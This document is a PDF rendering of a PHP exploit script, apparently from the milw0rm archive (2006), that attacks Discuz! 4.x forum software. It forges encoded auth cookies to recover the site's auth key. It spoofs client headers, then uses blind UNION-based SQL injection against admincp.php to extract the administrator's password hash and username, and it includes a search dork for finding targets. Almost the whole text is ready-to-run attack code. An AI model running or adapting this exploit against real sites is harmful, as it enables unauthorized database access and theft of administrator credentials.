Discuz 4.x SQL Injection Admin Credentials Disclosure Exploit.pdf

Loading ...
Global Do...
News & Politics
1 <?php
2 print_r(’
3
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
4 Discuz! 4.x SQL injection / admin credentials disclosure exploit
5
by rgod rgod@autistici.org
6
site: http://retrogod.altervista.org
7
dork: "powered by discuz!
8
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
9 ’);
10 if ($argc<3) {
11     print_r(’
12 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
13 Usage: php ’.$argv[0].’ host path OPTIONS
14
host:      target server (ip/hostname)
15
path:      path to discuz
16 Options:
17
 −p[port]:    specify a port other than 80
18
 −P[ip:port]: specify a proxy
19 Example:
20
php ’.$argv[0].’ localhost /discuz/ −P1.1.1.1:80
21
php ’.$argv[0].’ localhost /discuz/ −p81
22 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
23 ’);
24     die;
25 }
26 error_reporting(0);
27 ini_set("max_execution_time",0);
28 ini_set("default_socket_timeout",5);
29
30 function quick_dump($string)
31 {
32   $result=’’;$exa=’’;$cont=0;
33   for ($i=0; $i<=strlen($string)−1; $i++)
34   {
35    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
36    {$result.="  .";}
37    else
38    {$result.="  ".$string[$i];}
39    if (strlen(dechex(ord($string[$i])))==2)
40    {$exa.=" ".dechex(ord($string[$i]));}
41    else
42    {$exa.=" 0".dechex(ord($string[$i]));}
43    $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
44   }
45  return $exa."\r\n".$result;
46 }
47 $proxy_regex = ’(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
48
49 function sendpacketii($packet)
50 {
51   global $proxy, $host, $port, $html, $proxy_regex;
52   if ($proxy==’’) {
Page 1/5
Discuz 4.x SQL Injection Admin Credentials Disclosure Exploit
rgod
11/28/2006
53     $ock=fsockopen(gethostbyname($host),$port);
54     if (!$ock) {
55       echo ’No response from ’.$host.’:’.$port; die;
56     }
57   }
58   else {
59
$c = preg_match($proxy_regex,$proxy);
60     if (!$c) {
61       echo ’Not a valid proxy...’;die;
62     }
63     $parts=explode(’:’,$proxy);
64     echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
65     $ock=fsockopen($parts[0],$parts[1]);
66     if (!$ock) {
67       echo ’No response from proxy...’;die;
68
}
69   }
70   fputs($ock,$packet);
71   if ($proxy==’’) {
72     $html=’’;
73     while (!feof($ock)) {
74       $html.=fgets($ock);
75     }
76   }
77   else {
78     $html=’’;
79     while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
80       $html.=fread($ock,1);
81     }
82   }
83   fclose($ock);
84 }
85
86 $host=$argv[1];
87 $path=$argv[2];
88 $port=80;
89 $proxy="";
90 for ($i=3; $i<$argc; $i++){
91 $temp=$argv[$i][0].$argv[$i][1];
92 if ($temp=="−p")
93 {
94   $port=str_replace("−p","",$argv[$i]);
95 }
96 if ($temp=="−P")
97 {
98   $proxy=str_replace("−P","",$argv[$i]);
99 }
100 }
101 if (($path[0]<>’/’) or ($path[strlen($path)−1]<>’/’)) {echo ’Error... check the path!’; die;}
102 if ($proxy==’’) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}
103
104 echo "please wait...\n";
Page 2/5
Discuz 4.x SQL Injection Admin Credentials Disclosure Exploit
rgod
11/28/2006
105
106 //from global.func.php
107 function authcode($string, $operation, $key = ’’) {
108
$key = $key ? $key : $GLOBALS[’discuz_auth_key’];
109
$coded = ’’;
110
$keylength = 32;
111
$string = $operation == ’DECODE’ ? base64_decode($string) : $string;
112    
for($i = 0; $i < strlen($string); $i += 32) {
113
$coded .= substr($string, $i, 32) ^ $key;
114
}
115
$coded = $operation == ’ENCODE’ ? str_replace(’=’, ’’, base64_encode($coded)) : $coded;
116
return $coded;
117 }
118
119 //stolen from install.php
120 function random($length) {
121
$hash = ’’;
122
$chars = ’ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz’;
123
$max = strlen($chars) − 1;
124
mt_srand((double)microtime() * 1000000);
125
for($i = 0; $i < $length; $i++) {
126
$hash .= $chars[mt_rand(0, $max)];
127
}
128
return $hash;
129 }
130
131 $agent="Googlebot/2.1";
132 //see sql errors... you need auth key,
133 //it’s a value mixed up with the random string in cache_settigns.php and your user−agent, so let’s ask ;)
134 $tt="";for ($i=0; $i<=255; $i++){$tt.=chr($i);}
135 while (1)
136 {
137     $discuz_auth_key=random(32);
138     $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
139     $packet.="CLIENT−IP: 999.999.999.999\r\n";//spoof
140     $packet.="User−Agent: $agent\r\n";
141     $packet.="Host: ".$host."\r\n";
142     $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n";
143     $packet.="Accept: text/plain\r\n";
144     $packet.="Connection: Close\r\n\r\n";
145     $packet.=$data;
146     sendpacketii($packet);
147     $html=html_entity_decode($html);
148     $html=str_replace("<br />","",$html);
149     $t=explode("AND m.password=’",$html);
150     $t2=explode("’ ",$t[1]);
151     $pwd_f=$t2[0];
152     $t=explode("AND m.secques=’",$html);
153     $t2=explode("’\n",$t[1]);
154     $secques_f=$t2[0];
155     $t=explode("AND m.uid=’",$html);
156     $t2=explode("’\x0d",$t[1]);
Page 3/5
Discuz 4.x SQL Injection Admin Credentials Disclosure Exploit
rgod
11/28/2006
157     $uid_f=$t2[0];
158     $my_string=$pwd_f."\t".$secques_f."\t".$uid_f;
159     if ((strlen($my_string)==270) and (!eregi("=",$my_string))){
160         break;
161     }
162 }
163 $temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE");
164 //calculating key...
165 $key="";
166 for ($j=0; $j<32;  $j++){
167     for ($i=0; $i<255; $i++){
168         $aa="";
169         if ($j<>0){
170             for ($k=1; $k<=$j; $k++){
171                 $aa.="a";
172             }
173         }
174         $GLOBALS[’discuz_auth_key’]=$aa.chr($i);
175         $t = authcode($temp,"DECODE");
176         if ($t[$j]==$my_string[$j]){
177             $key.=chr($i);
178         }
179    }
180 }
181
182 //echo "AUTH KEY −>".$key."\r\n";
183 $GLOBALS[’discuz_auth_key’]=$key;
184
185 echo "pwd hash (md5) −> ";
186 $chars[0]=0;//null
187 $chars=array_merge($chars,range(48,57)); //numbers
188 $chars=array_merge($chars,range(97,102));//a−f letters
189 $j=1;$password="";
190 while (!strstr($password,chr(0)))
191 {
192     for ($i=0; $i<=255; $i++)
193     {
194         if (in_array($i,$chars))
195         {
196             //you can use every char because of base64_decode()...so this bypass magic quotes...
197             //and some help by extract() to overwrite vars
198             $sql="999999’/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
199             $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
200             $packet.="User−Agent: $agent\r\n";
201             $packet.="CLIENT−IP: 1.2.3.4\r\n";
202             $packet.="Host: ".$host."\r\n";
203             $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
204             $packet.="Accept: text/plain\r\n";
205             $packet.="Connection: Close\r\n\r\n";
206             $packet.=$data;
207             sendpacketii($packet);
Page 4/5
Discuz 4.x SQL Injection Admin Credentials Disclosure Exploit
rgod
11/28/2006
208             if (eregi("action=groupexpiry",$html)){
209                 $password.=chr($i);echo chr($i);sleep(1);break;
210             }
211         }
212         if ($i==255) {
213             die("\nExploit failed...");
214         }
215     }
216 $j++;
217 }
218
219 echo "\nadmin user     −> ";
220 $j=1;$admin="";
221 while (!strstr($admin,chr(0)))
222 {
223     for ($i=0; $i<=255; $i++)
224     {
225         $sql="999999’/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
226         $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
227         $packet.="User−Agent: $agent\r\n";
228         $packet.="CLIENT−IP: 1.2.3.4\r\n";
229         $packet.="Host: ".$host."\r\n";
230         $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
231         $packet.="Accept: text/plain\r\n";
232         $packet.="Connection: Close\r\n\r\n";
233         $packet.=$data;
234         sendpacketii($packet);
235         if (eregi("action=groupexpiry",$html)){
236             $admin.=chr($i);echo chr($i);sleep(1);break;
237         }
238         if ($i==255) {die("\nExploit failed...");}
239    }
240 $j++;
241 }
242
243 function is_hash($hash)
244 {
245  if (ereg("^[a−f0−9]{32}",trim($hash))) {return true;}
246  else {return false;}
247 }
248
249 if (is_hash($password)) {
250    echo "exploit succeeded...";
251 }
252 else {
253    echo "exploit failed...";
254 }
255 ?>
256
257 # milw0rm.com [2006−11−28]
Page 5/5
Discuz 4.x SQL Injection Admin Credentials Disclosure Exploit
rgod
11/28/2006